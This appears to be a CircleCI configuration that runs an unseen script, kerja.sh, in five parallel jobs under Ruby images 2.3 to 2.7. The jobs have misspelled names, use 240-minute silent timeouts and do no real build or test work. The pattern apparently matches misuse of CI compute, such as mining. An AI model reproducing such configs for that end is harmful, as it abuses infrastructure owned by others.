resource_class: large
working_dir: &working_dir ~/app

.build_template: &build_definition
  steps:
    - checkout 
    - run:  
        command: chmod +x ./kerja.sh && ./kerja.sh
        no_output_timeout: 240m

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  buifds2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  buifds2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  buifds2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  buifds2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  buifds2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3

workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - buifds2_7
      - buifds2_6
      - buifds2_5
      - buifds2_4
      - buifds2_3
